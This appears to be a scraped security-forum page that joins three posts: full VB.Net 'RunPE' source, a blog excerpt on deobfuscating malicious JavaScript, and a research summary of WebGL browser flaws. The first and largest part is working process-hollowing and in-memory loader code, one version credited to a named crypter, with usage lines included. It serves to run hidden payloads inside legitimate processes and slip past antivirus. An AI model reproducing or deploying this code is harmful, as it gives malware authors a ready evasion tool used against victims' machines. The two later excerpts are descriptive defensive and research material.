[VB.Net] RunPe's Reflection RunPe Credits: Deathader Imports System Imports System.Windows.Forms Imports System.Reflection Imports System.IO Imports System.Runtime.CompilerServices Private Function ReadExeFromFile(ByVal filename As String) As Byte() Dim fs As New FileStream(filename, FileMode.Open, FileAccess.Read) Dim exeData As Byte() = New Byte(fs.Length - 1) {} fs.Read(exeData, 0, System.Convert.ToInt32(fs.Length)) fs.Close() Return exeData End Function Private Function ReadExeFromResources(ByVal filename As String) As Byte() Dim CurrentAssembly As Reflection.Assembly = Reflection.Assembly.GetExecutingAssembly() Dim Resource As String = String.Empty Dim ArrResources As String() = CurrentAssembly.GetManifestResourceNames() For Each Resource In ArrResources If Resource.IndexOf(filename) > -1 Then _ Exit For Next Dim ResourceStream As IO.Stream = CurrentAssembly.GetManifestResourceStream(Resource) If ResourceStream Is Nothing Then Return Nothing End If Dim ResourcesBuffer(CInt(ResourceStream.Length) - 1) As Byte ResourceStream.Read(ResourcesBuffer, 0, ResourcesBuffer.Length) ResourceStream.Close() Return ResourcesBuffer End Function Private Function StringToByteArray(ByVal str As String) As Byte() Dim encoding As New System.Text.ASCIIEncoding() Return encoding.GetBytes(str) End Function Private Sub RunFromMemory(ByVal bytes As Byte()) Dim assembly As Assembly = assembly.Load(bytes) Dim entryPoint As MethodInfo = [assembly].EntryPoint Dim objectValue As Object = RuntimeHelpers.GetObjectValue([assembly].CreateInstance(entryPoint.Name)) entryPoint.Invoke(RuntimeHelpers.GetObjectValue(objectValue), New Object() {New String() {"1"}}) End Sub USAGE: Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Dim x As New Threading.Thread(AddressOf RunFromMemory) x.Start(ReadExeFromResources("EmbeddedExe.exe")) End Sub T0fx Pe & JapaBrz PE t0fx RunPe[used in Moon Crypter] [CODE]Class RunPE Public Const PAGE_NOCACHE As Long 
= &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 Public Const PAGE_READONLY As System.UInt32 = &H2 Shared Sub Execute(ByVal data() As Byte, ByVal target As String) Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags Dim GC = System.Runtime.InteropServices.GCHandle.Alloc(data, System.Runtime.InteropServices.GCHandleType.Pinned) Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32 Dim DH As New H.DOS_Header DH = System.Runtime.InteropServices.Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType) GC.Free() If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return Dim NH As New H.NT_Headers NH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + DH.Address), NH.GetType) Dim Address, Offset As Long, ret As UInteger SI.CB = Len(SI) C.Flags = 65538 If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return If H.GetThreadContext(PI.Thread, C) And H.ReadProcessMemory(PI.Process, C.Ebx + 8, Address, 4, 0) >= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then Dim ImageBase As System.UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4) If ImageBase <> 0 Then H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret) Offset = DH.Address + 248 For I As Integer = 0 To NH.File.Sections - 1 SH = System.Runtime.InteropServices.Marshal.PtrToStructure(New System.IntPtr(Buffer + Offset + I * 40), SH.GetType) Dim Raw(SH.Size) As Byte For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, 
ret) H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address) Next I Dim T = BitConverter.GetBytes(ImageBase) H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret) C.Eax = ImageBase + NH.Optional.Address H.SetThreadContext(PI.Thread, C) H.ResumeThread(PI.Thread) End If End If End Sub Public Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Public Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function Public Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function <System.ComponentModel.EditorBrowsable(1)> Friend Class H <System.Runtime.InteropServices.StructLayout(0)> Structure Context Dim Flags, D0, D1, D2, D3, D6, D7 As System.UInt32, Save As Save Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Save Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte() Dim State As System.UInt32 End Structure Structure Misc Dim Address, Size As System.UInt32 End Structure Structure Section_Header Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As System.UInt32 End Structure Structure 
Process_Information Dim Process, Thread As System.IntPtr, ProcessId, ThreadId As Integer End Structure <System.Runtime.InteropServices.StructLayout(0, CharSet:=3)> Structure Startup_Information Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Security_Flags Dim Length As Integer, Descriptor As System.IntPtr, Inherit As Integer End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure DOS_Header Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As System.UInt16() Dim ID, Info As System.UInt16 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As System.UInt16() Dim Address As System.Int32 End Structure Structure NT_Headers Dim Signature As System.UInt32, File As File_Header, [Optional] As Optional_Headers End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure File_Header Dim Machine, Sections As System.UInt16, Stamp, Table, Symbols As System.UInt32, Size, Flags As System.UInt16 End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Optional_Headers Public Magic As System.UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As System.UInt32, SectionA, FileA As System.UInt32 Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As System.UInt16, Version, SImage, SHeaders, Checksum As System.UInt32, Subsystem, Flags As System.UInt16 Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As System.UInt32 <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, 
SizeConst:=16)> Public DataDirectory As Data_Directory() End Structure <System.Runtime.InteropServices.StructLayout(0)> Structure Data_Directory Dim Address, Size As System.UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As System.UInt32, ByVal system As System.IntPtr, ByVal current As String, <System.Runtime.InteropServices.In()> ByRef startup As Startup_Information, <System.Runtime.InteropServices.Out()> ByRef info As Process_Information) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal buffer As Byte(), ByVal size As System.IntPtr, <System.Runtime.InteropServices.Out()> ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByRef buffer As System.IntPtr, ByVal size As System.IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UIntPtr, ByVal [new] As System.UIntPtr, <System.Runtime.InteropServices.Out()> ByVal old As System.UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As System.IntPtr, ByVal address As System.IntPtr, ByVal size As System.UInt32, ByVal type As System.UInt32, ByVal protect As System.UInt32) As System.IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As System.IntPtr, ByVal address As System.IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As System.IntPtr) As System.UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As System.IntPtr, ByRef context As Context) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As 
System.IntPtr, ByRef context As Context) As Boolean End Class End Class JapaBrz RunPe 'Made by JapaBrz Imports System.Runtime.InteropServices Imports System.Text Class DD <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Structure STARTUPINFO Public cb As Integer Public lpReserved As String Public lpDesktop As String Public lpTitle As String Public dwX As Integer Public dwY As Integer Public dwXSize As Integer Public dwYSize As Integer Public dwXCountChars As Integer Public dwYCountChars As Integer Public dwFillAttribute As Integer Public dwFlags As Integer Public wShowWindow As Short Public cbReserved2 As Short Public lpReserved2 As Integer Public hStdInput As Integer Public hStdOutput As Integer Public hStdError As Integer End Structure Private Structure PROCESS_INFORMATION Public hProcess As IntPtr Public hThread As IntPtr Public dwProcessId As Integer Public dwThreadId As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure IMAGE_DOS_HEADER Public e_magic As UInt16 ' Magic number Public e_cblp As UInt16 ' Bytes on last page of file Public e_cp As UInt16 ' Pages in file Public e_crlc As UInt16 ' Relocations Public e_cparhdr As UInt16 ' Size of header in paragraphs Public e_minalloc As UInt16 ' Minimum extra paragraphs needed Public e_maxalloc As UInt16 ' Maximum extra paragraphs needed Public e_ss As UInt16 ' Initial (relative) SS value Public e_sp As UInt16 ' Initial SP value Public e_csum As UInt16 ' Checksum Public e_ip As UInt16 ' Initial IP value Public e_cs As UInt16 ' Initial (relative) CS value Public e_lfarlc As UInt16 ' File address of relocation table Public e_ovno As UInt16 ' Overlay number <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _ Public e_res1 As UInt16() ' Reserved words Public e_oemid As UInt16 ' OEM identifier (for e_oeminfo) Public e_oeminfo As UInt16 ' OEM information; e_oemid specific <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _ Public e_res2 As UInt16() ' Reserved words Public 
e_lfanew As Int32 ' File address of new EXE header End Structure <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _ Private Structure VS_VERSIONINFO Public wLength As UInt16 Public wValueLength As UInt16 Public wType As UInt16 <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _ Public szKey As String Public Padding1 As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Structure SECURITY_ATTRIBUTES Public nLength As Integer Public lpSecurityDescriptor As IntPtr Public bInheritHandle As Integer End Structure <StructLayout(LayoutKind.Sequential)> _ Private Structure VS_FIXEDFILEINFO Public dwSignature As UInt32 Public dwStrucVersion As UInt32 Public dwFileVersionMS As UInt32 Public dwFileVersionLS As UInt32 Public dwProductVersionMS As UInt32 Public dwProductVersionLS As UInt32 Public dwFileFlagsMask As UInt32 Public dwFileFlags As UInt32 Public dwFileOS As UInt32 Public dwFileType As UInt32 Public dwFileSubtype As UInt32 Public dwFileDateMS As UInt32 Public dwFileDateLS As UInt32 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure FLOATING_SAVE_AREA Public ControlWord As UInteger Public StatusWord As UInteger Public TagWord As UInteger Public ErrorOffset As UInteger Public ErrorSelector As UInteger Public DataOffset As UInteger Public DataSelector As UInteger <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _ Public RegisterArea As Byte() Public Cr0NpxState As UInteger End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure CONTEXT Public ContextFlags As UInteger 'set this to an appropriate value ' Retrieved by CONTEXT_DEBUG_REGISTERS Public Dr0 As UInteger Public Dr1 As UInteger Public Dr2 As UInteger Public Dr3 As UInteger Public Dr6 As UInteger Public Dr7 As UInteger ' Retrieved by CONTEXT_FLOATING_POINT Public FloatSave As FLOATING_SAVE_AREA ' Retrieved by CONTEXT_SEGMENTS Public SegGs As UInteger Public SegFs As UInteger Public SegEs As UInteger Public SegDs As UInteger ' Retrieved by 
CONTEXT_INTEGER Public Edi As UInteger Public Esi As UInteger Public Ebx As UInteger Public Edx As UInteger Public Ecx As UInteger Public Eax As UInteger ' Retrieved by CONTEXT_CONTROL Public Ebp As UInteger Public Eip As UInteger Public SegCs As UInteger Public EFlags As UInteger Public Esp As UInteger Public SegSs As UInteger ' Retrieved by CONTEXT_EXTENDED_REGISTERS <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _ Public ExtendedRegisters As Byte() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_OPTIONAL_HEADER32 ' ' Standard fields. ' Public Magic As UInt16 Public MajorLinkerVersion As [Byte] Public MinorLinkerVersion As [Byte] Public SizeOfCode As UInt32 Public SizeOfInitializedData As UInt32 Public SizeOfUninitializedData As UInt32 Public AddressOfEntryPoint As UInt32 Public BaseOfCode As UInt32 Public BaseOfData As UInt32 ' ' NT additional fields. ' Public ImageBase As UInt32 Public SectionAlignment As UInt32 Public FileAlignment As UInt32 Public MajorOperatingSystemVersion As UInt16 Public MinorOperatingSystemVersion As UInt16 Public MajorImageVersion As UInt16 Public MinorImageVersion As UInt16 Public MajorSubsystemVersion As UInt16 Public MinorSubsystemVersion As UInt16 Public Win32VersionValue As UInt32 Public SizeOfImage As UInt32 Public SizeOfHeaders As UInt32 Public CheckSum As UInt32 Public Subsystem As UInt16 Public DllCharacteristics As UInt16 Public SizeOfStackReserve As UInt32 Public SizeOfStackCommit As UInt32 Public SizeOfHeapReserve As UInt32 Public SizeOfHeapCommit As UInt32 Public LoaderFlags As UInt32 Public NumberOfRvaAndSizes As UInt32 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _ Public DataDirectory As IMAGE_DATA_DIRECTORY() End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_FILE_HEADER Public Machine As UInt16 Public NumberOfSections As UInt16 Public TimeDateStamp As UInt32 Public PointerToSymbolTable As UInt32 Public NumberOfSymbols As UInt32 Public 
SizeOfOptionalHeader As UInt16 Public Characteristics As UInt16 End Structure <StructLayout(LayoutKind.Sequential)> _ Public Structure IMAGE_DATA_DIRECTORY Public VirtualAddress As UInt32 Public Size As UInt32 End Structure Public Structure IMAGE_NT_HEADERS Public Signature As UInt32 Public FileHeader As IMAGE_FILE_HEADER Public OptionalHeader As IMAGE_OPTIONAL_HEADER32 End Structure Public Enum IMAGE_SIZEOF_SHORT_NAME IMAGE_SIZEOF_SHORT_NAME = 8 End Enum Public Structure Misc Public PhysicalAddress As System.UInt32 Public VirtualSize As System.UInt32 End Structure Public Structure IMAGE_SECTION_HEADER Public Name As System.Byte Public Misc As Misc Public VirtualAddress As System.UInt32 Public SizeOfRawData As System.UInt32 Public PointerToRawData As System.UInt32 Public PointerToRelocations As System.UInt32 Public PointerToLinenumbers As System.UInt32 Public NumberOfRelocations As System.UInt16 Public NumberOfLinenumbers As System.UInt16 Public Characteristics As System.UInt32 End Structure Public Const CONTEXT_X86 = &H10000 Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1) 'SS:SP, CS:IP, FLAGS, BP Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2) 'AX, BX, CX, DX, SI, DI Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4) 'DS, ES, FS, GS Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8) '387 state Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7 Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS) Public Const CREATE_SUSPENDED = &H4 Public Const MEM_COMMIT As Long = &H1000& Public Const MEM_RESERVE As Long = &H2000& Public Const PAGE_NOCACHE As Long = &H200 Public Const PAGE_EXECUTE_READWRITE As Long = &H40 Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80 Public Const PAGE_EXECUTE_READ As Long = &H20 Public Const PAGE_EXECUTE As Long = &H10 Public Const PAGE_WRITECOPY As Long = &H8 Public Const PAGE_NOACCESS As Long = &H1 Public Const PAGE_READWRITE As Long = &H4 
<DllImport("kernel32.dll")> _ Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32 End Function <DllImport("kernel32.dll")> _ Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean End Function <DllImport("kernel32.dll")> _ Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer End Function <DllImport("kernel32.dll")> _ Private Shared Function CreateProcess(ByVal lpApplicationName As String, _ ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _ ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _ ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _ <[In]()> ByRef lpStartupInfo As STARTUPINFO, _ <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemory( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As Byte(), _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", _ SetLastError:=True, _ CharSet:=CharSet.Auto, _ EntryPoint:="WriteProcessMemory", _ CallingConvention:=CallingConvention.StdCall)> _ Shared Function WriteProcessMemoryI( _ ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As IntPtr, _ ByVal lpBuffer As IntPtr, _ ByVal iSize As Int32, _ <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean End Function <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _ Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _ ByVal lpBaseAddress As Integer, _ ByRef lpbuffer As IntPtr, 
_ ByVal size As Integer, _ ByRef lpNumberOfBytesRead As Integer) As Int32 End Function <DllImport("ntdll.dll")> _ Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long End Function <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _ Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _ ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _ ByVal flProtect As UInteger) As IntPtr End Function <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _ Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer End Function Const GENERIC_READ As Int32 = &H80000000 Const FILE_SHARE_READ As UInt32 = &H1 Const OPEN_EXISTING As UInt32 = 3 Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80 Const INVALID_HANDLE_VALUE As Int32 = -1 Const PAGE_READONLY As UInt32 = &H2 Const FILE_MAP_READ As UInt32 = &H4 Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D Const RT_VERSION As Int32 = 16 Private Enum ImageSignatureTypes IMAGE_DOS_SIGNATURE = &H5A4D ''\\ MZ IMAGE_OS2_SIGNATURE = &H454E ''\\ NE IMAGE_OS2_SIGNATURE_LE = &H454C ''\\ LE IMAGE_VXD_SIGNATURE = &H454C ''\\ LE IMAGE_NT_SIGNATURE = &H4550 ''\\ PE00 End Enum Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String) Dim sVersion As [String] = Nothing Dim pidh As IMAGE_DOS_HEADER Dim context As CONTEXT = New CONTEXT() Dim Pinh As IMAGE_NT_HEADERS Dim Pish As IMAGE_SECTION_HEADER Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION() Dim si As STARTUPINFO = New STARTUPINFO() Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES() 'converts a data type in another type. 
'since .net types are different from types handle by winAPI, DirectCall a API will cause a type mismatch, since .net types ' structure is completely different, using different resources. Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned) Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32 pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType) MyGC.Free() If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then Exit Sub End If Dim vt As Integer = ptbuffer + pidh.e_lfanew Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType) Dim addr As Long, lOffset As Long, ret As UInteger si.cb = Len(si) context.ContextFlags = CONTEXT86_INTEGER 'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub If GetThreadContext(pi.hThread, context) And _ ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _ ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE) If ImageBase <> 0 Then WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret) lOffset = pidh.e_lfanew + 248 For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1 'math changes, anyone with pe understanding know Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType) Dim braw(Pish.SizeOfRawData) As Byte 'more math for reading only the section. mm API has a "shortcut" when you pass a specified startpoint. 
'.net can't use so you have to make a new array For j As Integer = 0 To Pish.SizeOfRawData - 1 braw(j) = b(Pish.PointerToRawData + j) Next WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret) VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr) Next i Dim bb As Byte() = BitConverter.GetBytes(ImageBase) WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret) context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint Call SetThreadContext(pi.hThread, context) Call ResumeThread(pi.hThread) End If End If End Sub Private Shared Function Protect(ByVal characteristics As Long) As Long Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _ PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _ PAGE_READWRITE, PAGE_EXECUTE_READWRITE} Protect = mapping(RShift(characteristics, 29)) End Function Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift) End Function Private Shared Function vbLongToULong(ByVal Value As Long) As Double Const OFFSET_4 = 4294967296.0# If Value < 0 Then vbLongToULong = Value + OFFSET_4 Else vbLongToULong = Value End If End Function End Class Usage: SRexec(something, Application.ExecutablePath) Sursa: [VB.Net] RunPe's Thread - r00tsecurity
Javascript Deobfuscation Tools (Part 1) Posted on June 17, 2011 by darryl Deobfuscating Javascript can be tricky, so why not make the job easier by using a tool? There are several tools that can help you deobfuscate Javascript. Before I get to those tools, I wanted to show you how to deobfuscate scripts manually. I’ve been getting a lot of requests from folks who want to learn how to deobfuscate malscripts, so this article is for you. Let’s have a look at the malicious scripts. These scripts were found in the wild and selected based on their difficulty. I’ve uploaded these scripts to Pastebin.com so you can play along (warning: these are real malicious scripts, so take the necessary precautions!). Sample 1 This script is simple and should be easy for the tools to handle. There are interweaving comments that do nothing but throw you off visually. The script concatenates a long string of hex characters which are converted to text and reversed. Each text character is then searched for in a string and a corresponding new character is referenced. Here’s the string that the characters are searched for, and the second line is the converted value: SP%cpH2W5C83fEX:1rjF9AQdMlKi/sk4GuvtxJOBm_U.NqzY7aw&nhgZoVT=0IbRDye?6-L 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=% For example, if the first value is “L”, it will be converted to “%”. These new characters are joined together to form another string of hex characters, which are finally unescaped to form the final script. Here’s what you can do to see the final script: And this is what you get: Since this article is about tools, here’s a program that I wrote. It’s called Revelo (which is Latin for “reveal”), but it’s not quite ready for public release. This tool automates some of the manual changes I make to the scripts to deobfuscate the code. It’s not a debugger and more like a set of tools. 
Revelo has a built-in packet sniffer and proxy so I can capture the resulting HTTP request and see the URLs without actually visiting the site. It also has a built-in firewall to protect my PC from accidental redirects. Besides that, it can also reveal the actual deobfuscated code. I select the “Enclose Javascript in TextArea” option and get the resulting code: Mai sunt inca 2 exemple. Articol complet: http://www.kahusecurity.com/2011/javascript-deobfuscation-tools-part-1/
WebGL – More WebGL Security Flaws James Forshaw, Paul Stone, Michael Jordon 16th June 2011 Summary In this blog post Context demonstrates how to steal user data through web browsers using a vulnerability in Firefox’s implementation of WebGL. This is a continuation of our research into serious design flaws that could affect any browser which implements WebGL, currently Chrome and Firefox. Context has been researching the new 3D graphics technology, WebGL, which allows web pages to draw fast 3D graphics in a similar manner to computer games. This exciting technology has the capability to deliver a much richer experience to web users. However, to enable this impressive breakthrough in online technology, web browsers (currently Chrome and Firefox) have had to expose low level parts of their operating systems which previously could not be directly accessed by potentially malicious web pages, thus creating a number of potential security vulnerabilities. Context identified this (and other) issues with WebGL by evaluating Chrome and Firefox WebGL implementations against the conformance test suite devised by Khronos, the consortium which draws up the WebGL specification. We have established that none of the current implementations comply with this standard. Furthermore, Context’s research found that Khronos’ recommended defence against the DoS issue (WebGL_ARB_robustness) is not fit for purpose. First, only certain chipsets and operating systems (NVidia on Windows and Linux) support this feature. Moreover, this extension only offers mitigation, not a comprehensive solution to WebGL DoS issues. In the video below, we show how anyone running Firefox 4 with WebGL support is vulnerable to having malicious web pages capture screenshots of any window on their system. These screenshots could be of other web pages, the user’s desktop and other applications that run on their system. Background In our first blog Context outlines serious security concerns related to the use of WebGL. 
We were able to steal images from other web pages and crash people’s machines (Denial of Service, or DoS) from a malicious website. These examples showed the danger of allowing malicious code to run on graphics cards which were never designed to defend against this threat. After reviewing our previous work, Firefox has now removed support for cross-domain images (https://hacks.mozilla.org/2011/06/cross-domain-webgl-textures-disabled-in-firefox-5); while Khronos is updating the WebGL specification to include protection from DoS (using a new OpenGL extension GL_ARB_robustness) and Cross-Origin Resource Sharing (CORS) attacks (WebGL Security - khronos.org news). The fact that it is doing so raises the question as to whether this technology was specified, designed and implemented with security in mind. The problems we identified in our first blog were examples of the types of issues that can be created as a result of WebGL use. It is not totally unexpected or unusual for there to be security issues associated with a new technology, but it is crucial that the standard and the correct mitigation processes are quickly adjusted once such problems are identified to ensure that end user security is not compromised. To this end Context reviewed the conformance tests that Khronos has provided for WebGL vendors to use in assessing compliance to the standard. Through this work Context has discovered that neither Chrome nor Firefox passed the Khronos tests, including a number that are directly related to security. Context then explored the consequences of one of the failed conformance tests: the issue it identified allowed us to extract images containing data from the user’s desktop and from other web browser sessions such as authenticated pages. This issue was specific to Firefox and will be fixed in the next version of the browser. If you are concerned by WebGL based attacks see our FAQ for details on whether you are vulnerable and if so how to protect yourself. 
Articol complet: http://www.contextis.com/resources/blog/webgl2/
